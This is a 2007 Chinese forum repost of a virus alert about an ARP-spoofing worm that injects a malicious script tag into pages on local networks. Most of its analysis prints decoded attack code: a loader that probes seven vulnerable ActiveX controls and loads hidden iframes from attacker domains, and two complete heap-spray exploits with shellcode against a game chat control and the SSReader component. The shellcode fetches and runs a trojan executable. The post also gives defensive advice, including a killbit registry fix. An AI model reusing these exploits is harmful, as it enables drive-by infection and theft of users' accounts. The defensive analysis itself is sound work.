广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 2004 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
[病毒蠕虫] ARP病毒携新应用软件漏洞
ARP病毒携新应用软件漏洞
病毒预警:ARP病毒携新应用软件漏洞(联众游戏、超星阅读器 0-Day)大肆传播

近期,根据恶意代码检测,有一新的ARP病毒变种,利用新的应用软件漏洞(联众游戏了聊天室组件、超星阅读器0-Day)大肆传播,造成内网断网,帐号丢失。

该新ARP病毒变种,通过感染局域网中一台后,会将该电脑伪装成网关,这样局域网中其它电脑在浏览网页的时候,其返回的WEB页面中插入恶意网址连接:<script src=http://rb.vg/1.js></script> ,该恶意网址连接利用多个时下流行的网页木马漏洞,下载多款网游木马,这样导致中毒用户帐号丢失,遭受到损失。


图:ARP病毒插入的恶意代码框架

详细分析如下:

恶意网址连接:<script src=http://rb.vg/1.js></script> 采用的是js文件挂马法,该文件采用16进制代码加密,解密后的代码如下:

/*----------------------------------------------------

var vDA1 = new window["Date"]()
vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)
var eOTo$2 = new window["String"](window["document"]["cookie"])
var eZT3 = "Cookie1="
var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)
if (VMliYvVKu4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()

try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="http://nop.gs/s3...Js1.js"></script>');}catch(e){} // ms06014

try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...ok.gif"></iframe>');}catch(e){} // XL

try{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s3...68.gif"></iframe>');}catch(e){} // BF

try{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s3...8.gif"></iframe>');}catch(e){} // PPS

try{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s368...368.gif"></iframe>');}catch(e){} // CX

try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // LZ

try{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // Baidu

}

/*----------------------------------------------------

在该代码中,共利用以下7个漏洞下载木马病毒http://pic.16.vg/S...82.exe

ms06014 /经典的MS06-014挂马王漏洞

XL /迅雷5漏洞

BF /暴风影音漏洞

PPS /PPStream 漏洞

CX /超星阅读器漏洞 0-Day

LZ /联众游戏聊天室组件漏洞

Baidu /百度搜霸漏洞

下面说一下联众游戏聊天室组件漏洞和超星阅读器漏洞(0-Day) ,

http://nop.gs/s36...68.gif 是联众游戏聊天室组件的溢出代码,采用US-ASCii 加密,解密后的Exploits代码如下:

/**************************************************************************************************

<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var fsk51d2sl = "63e23c122";
var bigblock = unescape(""+""+"%u9090"+""+"%u9090");
var fsk51d2sl = "63e23c122";
var headersize = 20;
var fsk51d2sl = "63e23c122";
var slackspace = headersize+shellcode.length;
var fsk51d2sl = "63e23c122";
while (bigblock.length<slackspace) bigblock+=bigblock;
var fsk51d2sl = "63e23c122";
fillblock = bigblock.substring(0, slackspace);
var fsk51d2sl = "63e23c122";
block = bigblock.substring(0, bigblock.length-slackspace);
var fsk51d2sl = "63e23c122";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var fsk51d2sl = "63e23c122";
memory = new Array();
var fsk51d2sl = "63e23c122";
for (x=0; x<300; x++) memory[x] = block +shellcode;
var fsk51d2sl = "63e23c122";
var buffer = ''
var fsk51d2sl = "63e23c122";
while (buffer.length < 164) buffer+="A";
var fsk51d2sl = "63e23c122";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
var fsk51d2sl = "63e23c122";
ok="ok";
var fsk51d2sl = "63e23c122";
target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );
var fsk51d2sl = "63e23c122";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />

/**************************************************************************************************

有漏洞的组件为:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink

其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69

下载的病毒为: http://pic.16.vg/S...82.exe

超星阅读器的Exploits代码如下,这个看样子现在还是个0-Day

/**************************************************************************************************

<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e%ufb03"+""+""+"%u4e8b%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b"+""+""+"%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300"+""+""+"%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var bigblock = unescape(""+""+""+"%u9090"+""+""+"%u9090");
var el1s2kdo3r = "hi1265369";
var headersize = 20;
var el1s2kdo3r = "hi1265369";
var slackspace = headersize+shellcode.length;
var el1s2kdo3r = "hi1265369";
while (bigblock.length<slackspace) bigblock+=bigblock;
var el1s2kdo3r = "hi1265369";
fillblock = bigblock.substring(0, slackspace);
var el1s2kdo3r = "hi1265369";
block = bigblock.substring(0, bigblock.length-slackspace);
var el1s2kdo3r = "hi1265369";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var el1s2kdo3r = "hi1265369";
memory = new Array();
var el1s2kdo3r = "hi1265369";
for (x=0; x<100; x++) memory[x] = block +shellcode;
var el1s2kdo3r = "hi1265369";
var buffer = ''
var el1s2kdo3r = "hi1265369";
while (buffer.length < 1024) buffer+="\x05";
var el1s2kdo3r = "hi1265369";
var ok="1111";
var el1s2kdo3r = "hi1265369";
target.Register(ok,buffer);
var el1s2kdo3r = "hi1265369";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />

/**************************************************************************************************

有漏洞的组件为:C:\WINDOWS\system32\pdg2.dll

其CLSID:7F5E27CE-4A5C-11D3-9232-0000B48A05B2

下载的病毒同上个一样。

这回就连超星阅读器漏洞就被病毒作者利用上了,令我很是汗了一把~

请网管封杀 http://pic....vg/ 恶意网址,并将这些应用软件升级到最新版。

对于官方还没更新软件的0-Day漏洞,可以在注册表中设置killbit :

如超星阅读器的: 从最开始的MS06-014和MS07-017双漏洞挂马,到后来又加上了WEB迅雷漏洞三挂马法,再到时下十分流行的N个应用软件漏洞挂马,可见病毒作者为了将自己的马儿放出去,已经无所不用其极,下一个遭殃的软件会是那个呢?

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}]
"Compatibility Flags"=dword:00000400

近期网马漏洞不完全总结

百度搜霸ActiveX控件远程代码执行漏洞

PPStream 堆栈溢出漏洞

暴风影音2 mps.dll组件多个缓冲区溢出漏洞

jetAudio 7.x ActiveX漏洞

WEB迅雷漏洞

迅雷5漏洞

Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞

超星阅读器漏洞

联众游戏聊天室组件漏洞

From:网络巡警的博客



爸爸 你一路好走
献花 x0 回到顶端 [楼 主] From:台湾和信超媒体宽带网 | Posted:2007-10-26 01:50 |
super老师 手机
数位造型
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x14
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

现在网路病毒大多已能被防毒软体所侦测, 危险的是这些木马 蠕虫程式....
藏在网页的html当中, 让人防无可防, 大家可要小心浏览网站,
并建议使用FireFox 2.x (介面比IE7 友善多了),
加强网站浏览的安全性


只要相信 , 就能找到幸福
正面思考 , 天天快乐生活
推荐是发表好文的原动力
献花 x0 回到顶端 [1 楼] From:台湾 | Posted:2007-10-26 07:56 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.056010 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言